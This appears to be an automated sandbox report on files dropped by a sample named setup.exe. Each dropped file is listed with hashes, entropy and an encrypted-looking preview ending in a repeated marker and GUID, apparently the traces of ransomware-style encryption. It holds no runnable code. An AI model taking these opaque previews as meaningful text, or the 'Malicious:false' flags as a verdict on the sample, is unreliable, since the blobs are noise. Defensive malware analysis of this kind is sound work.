              Preview:<?xml.."w.....uI.0(D....?..CZ.2!.P.B.?.T...,{.o]...f.......b*..aH2...u....w.....M...j{c.L..t..`..!._K>a.C..i.?..R....Z.g.+J.P..2...<....Q./W._..p....Q......(...:"8.z..).9.N...v..8.....ID.$...ns. Y....W.}.....:.y.KQo.K.)..i}.E;n.'s.]{5..-.]a..M...O[,:o..9..?$Z3....[.QU.>/.v....rx..H5..-..{c<..&Xb.[.....V..SL........4.Lm)(......Fz.3........]2..U.w.....~.W..W4.)....z.x.e3~s=.>;......h..t......T..r?|....{.....4....oZ|.U.*..j....,U..%.7!.Dp<03.W......u.V@.'.....$..o.m.....g.Z.U.{.._.s....]...k...9#.P...@..<8.p.<.&..L.n.........U/.......W3...I.R......'|..nV.....:.N.:......I.E...../...Y"u.~...H.-....m#{Z?~[7..et..L"...&~.0..S...Yn.v..W.z..T.Y..4V..y.x.'..2r..w....v..A$n.....F..o...m..f.FR-.J..y...2..q^...Dk.?..>.*1.3.*d..C..|..A.........%.+"..V...........&^.+.b....d.. ..!{t.nW!D..dQ....@..3. %.V....0.=.4.x..=ZdB8..y.Z|3..U:dA.v!.[.92...al.c.....!........;....B.....].|..DRZ ..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4D
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):726
              Entropy (8bit):7.690533512589157
              Encrypted:false
              SSDEEP:12:LG8Xptb6MD+Sw0tI6yLaTbqK6E4FpwDuQC7hRLGPuEpwhU14HxzsMR2cii9a:Lxpt0yVFbVrWODu3GnpK3YbD
              MD5:C0BCDE043F2D1B98785B56BDD426F5D8
              SHA1:D8E9999D099D281DB17D41CDE64D6BEE914AC678
              SHA-256:9F9BD604252032CE70675F12D014B895C5A0A7EDACEF05DA34CFCC94F18E2115
              SHA-512:562BB5E556FCA3B894B27476F577CA0B0F0C60945AF992419BAEB948E3A7B5A8DFAA121D58FC7779F7C1933B8AEA461A6EC8DDE0C9F1E6A003B7CA2D76256FBC
              Malicious:false
              Preview:<?xml.....".E.Sp.zEu..M.#../*8...h.....S;.U...,b=........zp..:.6.e...v.V.....R.......G.RJ.........yL.Lo.cJ.....sX11....jX..)...YIR.m...D..y.#.1..[........j.g.me.pb..........w.k.}.i..Z....T........W..Sp.......c.4.'..v<.c..a...tc..<.!V...n..L.c|-X.g..?yg..K}n....<|&.2...9.......O]..o.J.F...y.#...../.w.E.T.Q./U.0...8>...A...#..D...<..B...%...V.3.L........$.=Lp.t..K...2.D.........5...pb...d.G....R..i..D.Q....(D......u...c...N..\(^.l...etc.3hG.F..`..W.fZ..}... z^..:.f.k..X$.S.7{S.....5...y.0..7.."..i.'8n".N...p..I]W/#.......B.t.Q.y.2q.OkL..S..(.{..&.v.....b.;...6..L4r...."%..}..{..g..V...yU.>d....Ji."Y.'.9F..#...H..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):931
              Entropy (8bit):7.777093067774772
              Encrypted:false
              SSDEEP:12:NeuqJcFrww02cK88s0MOiP7f5Uhb7/Z9th+sgZc6Dze/+v7Z8ISEMaI7pfsMR2cq:NeFJBjiVMOiPbkd9v+v66207OEa0bD
              MD5:E4615FA448523D9AD0A8F383D1F0D301
              SHA1:B3BD03A45A6FD52454F637F8FE3BCDE350083FD1
              SHA-256:74D16AA908BA4C5961D51A4847DE7881C4FC2283324746A08F4068ECB1B93C59
              SHA-512:6AB896C74090190C9B8A5DEF1D51397649EC6025070DF7DABDD86CBB459AC69C7997F5CA4E421239C746CB1DE6A0905696A6FAFC1C6A393CC5123856C140C78A
              Malicious:false
              Preview:<?xml|...M.s..8...9.Nt...ML...Y?|.&.R}%....M...28..O+..=^l..4?f.[.\A.<.N...c.fw.5.4....d.6*...GT..T..9&.`./.*.....L.o..+>.[.. .q]...Rh..a".G4......z$..y....^T.Pl.aM"M9]x..M..f.(g.>....?...$.sCBl.X..:O.....+.....f..|...84.[f...5...........)Xo..v7....k.....A..S..~?.3?.'}P...k...h.X..E.}.J...~.AE.f..3w..l..T..f..<d.'.j@...j.I....W.u..|...R.$K&U...{Q....)...'...O......w...A=......g`..f.......0p......b..B>.:.+ZoK....'.&_.i.;....+5.....q....k...OhAB..p'.`...DtWs ..x[B&..<\y.7....:.}.../.j~*.I.Tb..Bq..7<..vB...w.[.....I!.t.h.2....3...7i.B2..z.p.p.....&....h...9..R9<I...1...M..a.BQ..u.....Z.3+...{............uy..S6.P.."_........2..,..........XT..p....{.......~-.n5.Nv./.F..9...S.....e....].@.u{.G....u..(/....w..(...b"F".[Tx.....Q.n.C>1.}7.#..?.V.}.c_...Su..'......NEm...X.[..P.S.qJ.....P...A..B..:O.n.}.'...1. [...&.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):923
              Entropy (8bit):7.788268617559383
              Encrypted:false
              SSDEEP:12:lEE7G6Tng+RjWjMk5EBUGkeaxz0eLhY7co0rviTydRoCpIm62tZrpDokhgswi7X+:6EjnJpWjwcHTjiTqoCpI12PDpvzH8XbD
              MD5:CF3B4FD72092160C2ABD16FA083769DE
              SHA1:3DE00336A28664D31A5F4AB5F4E67D2D7BD539E0
              SHA-256:49DF60DA20DB6F76ACF707F609D69710E3306428C9D95B7629E707424BEAF77A
              SHA-512:455443D5760D07A27AD72E83011A50227D326DDE8337FD3CBF78686A787B71EAF8AA5E1BBD0E853B08F844831E87B62833C2B07F612D9A3A686CC8168166389D
              Malicious:false
              Preview:<?xml....&.."h..Q6!. ..ZW..r...|.............j.1-.s.Nh..\...+...;.t..Z.U]...0tV}..ALGNWY.j.Swe2./n.6.\............p`...C.. ...o.x..hC.+... o]....WuM..oZ!..0<..}lH.u2E......>.......).Lo&yY.m3...|M.A.T.?.aOM...`.@.:.'.&.l.o..a.g......R._.^.J.d...1...FU.1. ....O.s.0^..IH....'5.(.Y&.=.i..)G..o.@.2~....1M.....D..V2^^,q..(..#._o....#@..J..(.-0.@.n..E..$..Do...2._....2.......!..%.M.-.D..K.[Xgq.9...J..8}U..9..[...i...HE...+...1.. \..s+#..8g.+.@.v7.y.!..R.G.N.6......>....,..F.=.g=+.T#.R..].A..{../D'...?.YjNZ..ed.t.[...........dc..........Z...OW...&2...b...6.._..d..C..GfV.D..q........5{...:.O..'Ro...\.L.~..T.D.+....moI.t}Q.. ....Z2.T....4.K.;...e..Q......k.2%w..Z..mII.e.....6...Cr.3..MX.db...A.Y....y""..m..Jh....R..!.!6.Z..J.\&.d&=-J.......y...0....u..f.sr.......|..Uj.........i..h.}E.R.Qo7i...};...G.5VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1267
              Entropy (8bit):7.840851228847403
              Encrypted:false
              SSDEEP:24:gKh0Mly/8Z9UxkdWxv+5OugGQsm5c89oO0E3x8JAuI7SYbUHWbD:gn/jh+tGa0ob2h7oHED
              MD5:75E7D1C683B7C4471659C3A3099C06F6
              SHA1:5CD6477BCF495C461E695674CD89440B8082464E
              SHA-256:E1DE71325B65A4A68C0706B2967B7E05AED4A62D36118D61D7FF96E126BAEEB9
              SHA-512:BE9862056DC27E3CB001AC7C2C413D4F914EB4BE876D9F0F0BE28EC921A2F713C61704728BAF54E9277B9BEA03DFB0CDDD57DB8F80BCB2355BE8151A2367EE5C
              Malicious:false
              Preview:<?xml..)..:..0Fv.3....R.......-.>8.t<...[$..RM*.m.:....;...m...).(...6....;k.......S..Z...*.A.%...W...*.r...>2..W..S.../f=k..H!.\.tnI..H.q\...?.=..I.. f_\.D[i.Xi..q^.U..<h.<W.E.h9.1.a....p..9...<...!3.3}X6...N...<...w@..4.a..U.t..+l.c...v....i..-.:.-..*.Q.m._.-K.9.............N.....9D..n....S.|g..........r......Z.......`.@v..o....^..H.............<C|1.......0.aW.cOY.....{(...D....>.............%.W.HW..Pe9.MsE...s.. .=.8...y.S".f..w..H..$...+E9.K..;;i-....1....A.. ....,..GZ..(....S..o...l..hk.=i...8."....$.....P..r.U.W..{.B%..".I.i.R!.#....(..B.....f...Y..N.k-......IU?..~w.B.Yh...`.BCn..I....^...u.h...t..3I.>G..~7.@.E.=..1_...'l...z.....+6~.R...y|..@7.BM.,=.U..K.F......=..).>.. .<..]...$}.9...L..S.|D@...X...Y.y.d_.[#.|..M.38.@P(.~..../*.G~.!%.....U..g..r..|P...!6.1.>3....i..?.]...*.H..njk.....-.ek...F...Dv0l....m.~K...c..|.1.0uW....J!D.7....c...p.7.}.v<.B..^#...P..2U.....)W..hZ.BR....6..h..uOs.SrQ....>b.a..?..."... ...........#.ip.}v.?...T.*6.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):719
              Entropy (8bit):7.685725914749049
              Encrypted:false
              SSDEEP:12:st25qtdnEm1GbtUXyOHhxkdSxXTIunCD5weqo12zeQaXU/5t7VasMR2cii9a:soa8ORkajIunCDCeqo1BW7bD
              MD5:175F7D343B6D169F0A15EDB85C35E6D0
              SHA1:FE79D1E4C9A3E6E2ABB6AC9942C22BE7117EB1D0
              SHA-256:93BFE62CEECF9615E60051354BD34920CCCDDBD9C2A9652CB19605836898C58A
              SHA-512:EFAD6D3AB8956D9E5CAE69AFAF21641A10326D6313B02532206D05E7BF64BCA65080821889322F553F91EF0541D0B2FD0DB1A16B7913A5330CA17916A1F8D815
              Malicious:false
              Preview:<?xml.s...[..0........*.\-U'#{``4..|*..8.u.d7zi?XJ).y...r..z`"....c;..\J<.|..m......N.u(....u.;q.v..].r..`.Q.?.X?..9.Q..[R..@..a.......G.R.j......p.:o..=.....`....g;K.n@.K9.(.D0.7.[k/..Q-.y>e......C.....#.5.H.g6..o....j\m..>../.<.....x.w.w....uI.~N.....yuE..p.t%9..}EV.!a. !f..s..}..-.I.5...L,~6...z..2cUi.4.._s..v..Cvd... ..+KB\+...... ..h......Sz8Jq..".E.....c....~..r&..[.^.N.p..2..F..k/.c.=.Z.^.q..#5......D-KlY.&...pb....[.....:S4....~.O..6F.0F}..\.tVO..|.]....oG.."Y...&...j..RJ..V.....`*.;..X.k.......8Yb..J',.[.........`.wp..?|...-..lfb.0...{8.E.@,..1....n_<...<6..5.C..D.........t^..r(yv..p..T.>...40MVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):723
              Entropy (8bit):7.692569640023356
              Encrypted:false
              SSDEEP:12:MprEQrfYUG8BWM1kzj+U75J1kH6o9jW0n07t79vfSaP6NK1lnzsMR2cii9a:MprJ79G89g5J1po9jWtxSU1CbD
              MD5:F8FE35E501A57A962C5BE11440E86F48
              SHA1:1391DFAA11FF912F920B88DE9546EE3D8B3A1878
              SHA-256:07C4BA7792CB891DB5803BA8A4EDDE538F696E0CB80EB83B68FB4C78CDC676B6
              SHA-512:EE153A48494F12FD793088640852169C1A849FBD67246C578789B4F69F19F95090ECD9E3414D6BE20A0BE5C607D7BEF0FCF961948E8DC1C397ED0147B1C61649
              Malicious:false
              Preview:<?xml..J.....Pz...F..?.'T...#....c1F......I.'.....;..>..%.56.....+....t.E``M.........w@._...:R..v....'.!I(.k.?!...Zn^j.I..o..L.i....&pv/:Jt$'.l..\...O...0....'.SU....|iR..x3.Xf...1-..iG......6k....-.Cz1z.....,.......W..Z....c.,a.O*.}.I..q..s,..Kp:.....p...Y..&.>..M..}k..{...H..4.6.).H.SDW..,.c.$Z..,.-\.S<.)... ....4.Z...i.5.x......vy..-..=?{-z.'q!..*..M).=.O.....ru..e.6.n.hw.q.p.1..69M_.l.#q..2.7.j?..O.Zb..._.q...A....z>D...f5...T.Jf..........YH;.'.<..q...0.'.DX.V.......D...t%R.".<......b.8......sW.:_..?.>..+aF$.,;.a|......sbi\W...E/b..,F....{".O...@GGt6....%..3t.._~.......T.K.>)i..N..S..a.O.(...,P.o2.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):817
              Entropy (8bit):7.719704381671144
              Encrypted:false
              SSDEEP:24:pAZ/0xr8uJ/+k4ZUO14I+9ht2mSI6ExmkLNWzzMYbD:pA9y9JWfvSI0zR6ExhLYcCD
              MD5:1C5BDAAF3B416B9213E650C8B0C503E8
              SHA1:97E15A02290AEA30C513258894E59044717FC10E
              SHA-256:8B592D7A1B5187F27FAD4A75CE3B770D048524C3515000A8F6284E2175C8FA0C
              SHA-512:D5406837AF1EC76633D2F126323199D9E18F47BD86F909850E1EF3227673D2768709B8838F3F23555C2F39D910C57619587769B62C4A1B8C257964853B23F269
              Malicious:false
              Preview:<?xml..AV"m..z'7.X.....t9b....]C....:.N..... ..,.9.i..p.k.~GZ.|.....1M..f....+m....X..VH=...`.V..,.y....Q......<......d....d.g..R.....7Ql,..<d.h.T=......-..D..&Mw.....Z.n.M..."...K..L...........@...9..n..q^6g[...575..a&.....[>.......g..6..$..e...%...@.+..#.*.o..$.,B\....N0.H...O.J.*.....Vl.".Y...h..#~.B...*d.K..KVql...L.IA.l...-x..Cwzx.Pl....+..t..1....VD.kM3{.H......S6..)............$. e.F~....On.....R.L'@...R....#.%....Iz.(...6NE0.ch...e.S.....i7...~g!R....|.LB...]..d...z....WJ3..@.K...L.......bj........+aM7ob2KV....:E...E.5H 4Z.:......K..SB....K........<......C....%..@..p...Hn...OX.pi..p,...T..S.=..~2...j.../.kJ..A.0[.d!...j........3Bl..9.8#..:1...W.....&.....q..*8.....6B....S......0..f.oqQt"b...".VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):719
              Entropy (8bit):7.680614799102787
              Encrypted:false
              SSDEEP:12:4UqItrHdGZa4WiuflBeR2314gCNtzhkFw8GWMrC0jJykEV99m4WezsMR2cii9a:4UqI7GZaNlQwF4gCNbgt90jJZEV9E4WL
              MD5:4FF45AEA3D4DE4EE7F4F6E55578698D9
              SHA1:85B9D26382CDB7402D70BCCD7D9F1FDB67EB3D40
              SHA-256:431B0016E2ADE8BC35663201D4D8AF9DCA76BB1E02D906FE8974658067DD6FBA
              SHA-512:819A487F174F761E0ACB10484D25EBD53FBED49B3BA3DF8D05C54463ADF8B9EF8706A5F4BACB7B6234E64D7735B97B57467E7B980C2D64E4A5169A92C56FE3B3
              Malicious:false
              Preview:<?xml<+D.....N.*)....8..>......9.......#.N..... .h+..s......W1...8i..-.*\...q...c...1...<........P...<...=..W...j..H.....3.R..5.BG.G.+-.PM..A....XB~.[.....&.H...x....q...c..%.^..qe...8..Pl.. ...g.vP....V'.pZ..,_;C...?...T.{o..Qm.Q.'...1......xB-.ENAs..?.u..`...Q.B.+.t....@....j.B38.j.c&>LFFl/{G....Ja:cy..!.1...nh..P@...c.c.T_6S.H......k...o....(i.#...`..4.|.U#.#.....c......2....*..u....^.qB#.4/...O............@.xL...P]...X.:.k4.X..p.......S..ykV...v6r....?.V.J....+BG.Z..m.{3.{.SC........f..`;..2.z..hs.s.....1H^..G...........K...I..4.I.....y0.,.......B..=.U.>..!c......)...._;v..%k...:...[C.....VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):881
              Entropy (8bit):7.754776760402609
              Encrypted:false
              SSDEEP:12:xJUWP90/P5drB++k5EKV20ocQE66zh7SFiWg2Sx/mwPgwmw6G5SgyIYhjoEfqUWD:8BbY5EKUp+4Fip9Z6aj25CdpHhbD
              MD5:99729BD116BBF27A1696A5943985BE1E
              SHA1:5C9F8C6F01E2C76A3D4016031735BF244412E1D6
              SHA-256:6488DBF3E0EF5B86E001C17EA64A6D5B88BB02D13DB94B5A33B84576058490BF
              SHA-512:1E31A4F6B5C2EEE9DE8909549B5FD955BFD9FA87B27A3E2CD68236F4F2FB601AF10A3B43CF40B63FBCD180853A41C2692F062EB2FC030B8ECBF3240DA0ECB424
              Malicious:false
              Preview:<?xml317...X...~..>.+ls..|T....g....V.Cpn.*....z[...?$p,..3&..'.....Y.R...+.3...AE..`......>.eD.v....n.kP...s..e3...iK.w...7....y.W9.~1Vc..u...G0......V{...u.^.+.n..i...&hb.g...o..!.S._l.B...M.Hu....$.....={....<..V.........0("z...L..@.\l.a..<g..iB...g...V....W....5R...K..h.\.Rm.+..u...PJ.."h.J..N.^.}...Q......E1...'..W...->..SF...rc^.$..J....'.L....=.8.34......k).&N..M.2..lq.9.J..*M.)pCqx..u ..kZC..M.A....=V..=.])l...PL.x.W.........cK.KW..:.d.S1...Cl...>.b.N.Ko.-K...!....S.:<....*....^..+,m...6.....Y....s..+(wf|vM..J..@...K..>.7lY...-...Mz......A.Ro,.i......3...Sl..c|m.o$8.G..+..?..&...T'...+.....\.:zoW..w.....v.v..n..>.&v....0./...6..C.LF...5.l....~.....IOTz.%...{......[.d..P&.....s.o...5. ...s.......i..."...o~.1......}...hM..]..) s....n./.K.V..d.)b..A.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):737
              Entropy (8bit):7.720746902319375
              Encrypted:false
              SSDEEP:12:oBSLtc+nUI3NZ8W8rICmBGBIEb/JTsfNhn4nvVTORqJIU/Uz4Lx7PGDhUojf+4I2:MCq+nvgHZBIEbBTUh4ntlpUcLx7GdLE2
              MD5:0CCF92FD6CB277B74C9B1E000785F356
              SHA1:B4D035A30B119E2D11C2E4D873CEFFEC7577ED6E
              SHA-256:3EDF22740A2D40521D21D785E6EA300C61BEAA1CFDDF7F0CFED50F3CD2344C76
              SHA-512:C1665886EE06E5E4C963D1EBBAA5CE06149CFD584DD71940D2EDC0B58DE069988F55A359FAA26FDD50C6DF2874CF57C1C7BCCBF427807A111A7B1893CF035643
              Malicious:false
              Preview:<?xml.. .......z..EVg....<...S2.1.Xc>1H...i..'..9:m?2PBJ#.I.C.u.W..-.E1.I./H.. g...b..X....>...".K.-.rF.o..w].dnY3....W...3.|.|Z.}..........S.<<....FK.......=M.+.L.Q$.lq3K.Q.& ......Io.....w..u.Y.Z...?....l.a..).;..o....Rbj$..,..+"^.....k)..s...T.......t.'_..&.@.j1....v.K.V..!P.f8.P_2AB..S.xE*.{...`2...0m.lS......a.....Ods....`.s'.gA..x...v,.].Bil..[..Rm.k.Z*...H..f....\FN.eJB. W.E..k71.C;z....}...e.uI.]....gX...|.):G.<...w..}...N..IRn....X.|n.P..j.\.H.0?~.g.../..[...-M.!.K..*.0.k.l..f.?.Rm....@..p...)e..2..k.G.q...0.@..Y9.s..+.)..Es..jNpZ..Mr....ya.....s...r...TX...L.J."g...:4.O...x..{.[,.....h.I..IC.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1421
              Entropy (8bit):7.857281340259478
              Encrypted:false
              SSDEEP:24:lLSYpebzLEa3wjAmTORHdLNcHl9yFl2PXQpYm2uAI1NBT/W5GafUd3+s5bD:tSKeb3EbjrORKlgFgPXGYmr3jkfS5D
              MD5:E5FC8F5333515B779B7C19F39555FCB6
              SHA1:D5D733E662E781D39FB79E21CCF0C25377524186
              SHA-256:7AB64A4A027B65BC599F24880F2127F23AAD24E372D8C291BD15C97C933B3E8B
              SHA-512:03D0639DF6AC504B1D4D7EF9B128AF1ACE46144D1B8DCB92A413AFEBA68C2836F8DA1DBF1678674A47426E54345B8FB7641705EA3C71D6FD2D3B8FB0C131A5DA
              Malicious:false
              Preview:<?xml.4.{DP8o...R;ie....A.......I.a.?E..D.o.....ZB..u..pL..R..U<.Pd(..s...@Ae.*X...P..fj...ZzM..s..7...#..H3........]...t.y.G.L.....2.......R.....J......n#.p..[-.LZ.z]\..L.'.b..._..k.a..E).;:s$.W..Dp..U;..p.....F..#..t..:..3U."}r'.c...1.X....(.g..c}..kV.Q..4'Ic.C:....N._.....1.*....!.P..$-}.2z.,;..S~...|u^c.k.w5.S....p...N<.y.........}..kg....k@.~{f7V.H5z.......=..w.CR...w.@L<4R...X.....:..[...g...9..r5RV...J..s..j..1z...o...A.,0 .q.[J7.4.m..A......1Z1.s...r....TRDN.K...Y....{ya...L....`+.9.........R....`.U]t..fVW.sPXc.....A.h.o.m.W.5.?8..x.l.n...v....&.j6k...K..e......sj.]!.....[\...B...jp^.U.iv4..........w6.*..dz..'.,.e.6.:..".I.ic.B..0.AD..Q..B.......{...l...c..`.K.#..K.......)..).IWM.._.......k...N.J..v"..H.$...J$....o...Z{...H..)..sa.k...,ko.29E.>.+b.......Q..P?..p.7.h.7.d..../.!.^......oe.#R6.......t4.;......Z.7.QO^...@.(h.....(.......!..+....xu.....Tfu;.*w..-.........Oq^..m.Y..E..E.....J1..J.....(....KT...,.-,.C.>2.r.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1171
              Entropy (8bit):7.83958542202178
              Encrypted:false
              SSDEEP:24:AY2DymA8KgDwW5/WjRK87QP8qL5hEYIrsOZAbyS9J9hxNbD:L2f/iREEqL53IwoA2Sr9hHD
              MD5:9AF95F3FEC722F1699E72E55C49B9F02
              SHA1:EBFADB0BBF1F972724C4F05700351D96A3E11900
              SHA-256:CBB8CF0DE4F5B00A2654DEDFCC535425F4F1EF389568F6C8FDD6A826265A357C
              SHA-512:0DA628BB31CDC183697328F171984B431C9CC597AFEF9FE25E1A8D556F8A5B0D1375039BFC3BA3702247ABED7D4C8C3EAD1622F9F298FEF1F851829B2541EB6B
              Malicious:false
              Preview:<?xml..u[..Q...9..o/d......@.>A....9.*.o...W.*.(..&.......-.......Pb.<........9Y....W.K...^.-.q.v...s..VM>.L..hi3....w./....RP.Y..ru9....Y_.6.7. v..;.[.6.L...?....g...v....{.x.../.9......Q..b..L ......^.....z..).j...mfn..y0.>L|*..V.....+.~.u.\o.Y..\..l'....9....P.[....f..KX-......F.o.k<.bCh..V.....|....3.<. .....NM....O*...x.4L....0...Z(5#.t...e..].dE..o..m.....L.S..g$!0..0.>S;|......H.*,/-y..\j....zC+.}.m........z.7..hkJ.....j}.R.t..........k.K...c.z.....H.,AwDp..f..P.>>.W..=,....D.....*..$I:...~..#....6.l|t^J'........@....m..s &......A{.>.......O.+..8.Q.S....s-R...,..n|B.%....i:....i.. p:.....7.".s.x.+e.].}.?..2 .Z...&...pv..!.....b.j.|....m..3.[EJ.c^v.,M....,....e.0..{.E4.......H.......8q..!L=.a...l....-..m...Es...0..'.[.%e].].....!.Rqh.........6q.%..`+]..Wx8..L.|.R.E..h..k........i...6,..`[(.A\D.]..S=./..=.M....]Y.nq...f....+..|<.uqxtr....T...sE|...'.O.....4.e...|eN.Qx..s..O.......k.....]..2.,<.}p.l..a..L:......N,..4z?
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1176
              Entropy (8bit):7.8217983516548735
              Encrypted:false
              SSDEEP:24:JqNEbszKUX90793wViN8Jd3oia/WHeWkC/rueQv730ak3xpbD:0EIzKj7Fwlo3WHBk+qBJk3HD
              MD5:6A51D63DB9C2BE0A82028CC30FAECAD7
              SHA1:D53CAC8CDBB3CE8507C8040A0863FF2479803672
              SHA-256:E008A60AF092F4ED7684CB4617F296F2A9FDE0CD49426006ECDDD82CD05DFDC7
              SHA-512:4E120E26BCEBA49B56BF35CE096BE75624F3678D3BE5CA8DD18ABFFE2ED342D4E7DE0C4A64F666B6EC93096123AC5248D4CF37BC2998A7D932C66A8C61DD5CA3
              Malicious:false
              Preview:<?xml{....P+.xM.hi.R.].p.MA.vL..nO..97.6....LV....X.`..m..M-...8W..b...7..slp...0.&W.w|..e6.....=.+...*.h.^.L2b..^0.~.e.jR..9{...Q.....OX.bm.*ky.X%...@/..Tn_...HG.-G..C...v...!2A._.r\...<.>.9r<..<%`$4..g.9s..bo...r2..4............Lr...UpN.Ur`..@A..k8/.w..2.U..$...k^.%+..J..P.`GG.....i..'...0...E6..`.Q......y....J.4..l...rl..^...DE..o..1.....Zy.I...=2.%S5..tjHA3.G.?..*M.i.\.u.U~.2\b!M...*&. ......P.T.."....^}...C..:.$..]H.. 8L.&..g..#.f?.S<.. ....~...3.w.&.....iS,a.....}...........a....:.....6.}.....3p...9.9...-..M5.y..F...2.B.rS...X...*w"....Yl..>.?.~Vbj.'-?..+..${..E.Y...VU....E...J.Q#.........j2.....Y...^@..a...eY8`.u.......a(...B....5^.h..../.`).x......"D.\.`....rhI..i.....[Hg.....d..Z.>'.&8.....l/.Nz.....'.&7.Cko.........q..i...'.....y............_..>.b.-..gF&....i..........h.1.*..].r._.#.$....H...@..R.p1.1.z.s.m5..B.......T.C:.u6...Aq....m..~.x..8....C...Z....?..;...`y..Jns.Q.s...........i[..i..gj.R}..\&.9..%....t+..z...`.....l cU
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1155
              Entropy (8bit):7.822640971732916
              Encrypted:false
              SSDEEP:24:QAX4THQONgT/VNaDB0deK6wuvXAsNP2GUeck45rQ3nXTy+AjSbD:QtTw6gTIB0IK6wuvVP2GUetar8yAD
              MD5:ED3A69BF217597B9FC8252972F77E6DE
              SHA1:81E15CCE06C9D5D96CEA92C8DF5D6789645B3FC9
              SHA-256:BEBA61B6D5644633C7C0CA55263339178C9D8635D843C95AA50D842808EA10E9
              SHA-512:C3E616C0D85FD766F0B5CE42D62217D7654943228AE2E8BD9CCD6747E9AB64000A18AE94C60D438CD9B766186C6B014A9C608F1CC5F0B30E46B612E9603A9163
              Malicious:false
              Preview:<?xmlm..6.Uo...Fp......hz..+.5+..N._D....=@.'.v.....|...o..fI.%.`...(*.-N].O..9....eG.=.L....$.1d..h-J.~.PCB.n.. .p.9....L.....Q9...oUUS.~.tJ....o,.$..^c.k....h.Pey..4.....t.lEO..x...o......z......g....!.9...E0.qy..%.N..kc..K+-..9.i4{uNqY"\f...+...&H....M.sA.[.MtS).........n.....u...X.#B...e$.\I.#.>..K.w.h..O..W...nl.......IS.(..@..=...g..p.U.z........,...V.M..q..i.....y..<..O9...k..>n.;.w#..A.9$$..y..ux.U........s:.wG.......p.....n.....TR1.E.D.cM.S)+.C..ge..~!.Z......{+(.0....t.0=.a.S.4.t.oE.Y.....npV.k`A..8ehY.Ht._s.T...A..b._.+..|.....2...}.*.+b.+3,..K...P.Do.OZ.......!n...C!...)..M#....n.o...E.1..h.c~....OB.A..q...;d.LJ.3...L.......+.....2..B....R!.f.k[.A.CT....J.a*#......h.%=54.(zq...B[...l...o....=sP.G....krC.2x...RHRl..`.k.a".=u.H...W.R/......B.d...s.{Su....].0.W...0..K'..8...i*.%......v...s%..k..U.?-.P7[.2.......}...C..U&...."...e......d..Sm.\o....m.!=I.{.Lif.5..S..K...}.9..~pTH.7}f.A.j...p..N.p.[$Hi1..2....S...M.$F.......l...P...>
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):715
              Entropy (8bit):7.696147170877356
              Encrypted:false
              SSDEEP:12:x7ru+rfrDUaJqa0wXCvu6COe+MneVRGYgwnCDeGgIVLM5naPHBV21PPQmrrV9zsV:xX1DJJqa0wyvu5Oe+0eVRLUeIVoRcHjl
              MD5:691A843B7FB1F8DEB0DEF3CE75EF9A9B
              SHA1:88EFD8AEF5CEABB8CBEB03EA34202FCFBD1CB38F
              SHA-256:626499D5B9B18DF8FFF0DE08FA9DE1D628F7838F04F1F100564586F0358E07FB
              SHA-512:E7519368361730E64C0CABF3403D1481302A0D7AD777DBA5A8B0B31FBB8D3A610112B5BB84C2820CF12C5E81C10114D3D04B777C87E5E0019682511494EEDE30
              Malicious:false
              Preview:<?xmlL.E.8...M./.@...r.....W.......q{.(d..(;.z..)...X..-]-I...!KgZ..?.~5....'.A.WzN..j.V>.....\...2..TT^Oe.;M.b....u....U....P.u..Q@{.....fcB.0......^5i..$w....R....Ll...../H..v..m.<.+..)0I.>.R..-s..78......:...:G6h........:_.m...{y.d.Y.bU.S..i.:<....=..8....N$..N....?A;.>..)..hN.IO..-Qi.D".i.......E.o..#..G$.i.%...U#.z.[..{wo=sC }....R.Q...1jz.E.l!......5.M!a.Kj........~.#f....=.....!..s....~+.V...C.o.....lE.f.*.a...hk......H..V.1..txP..N..Y..].3t].......J.M<..i.O..h..V..g.......*...EP5.."...p..S.c...........[2..q9.[.k.....3.P...Q.cG.q...8...sM8....R..u.+...TE.4.E...7.(.g...2 `.....BC.......VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
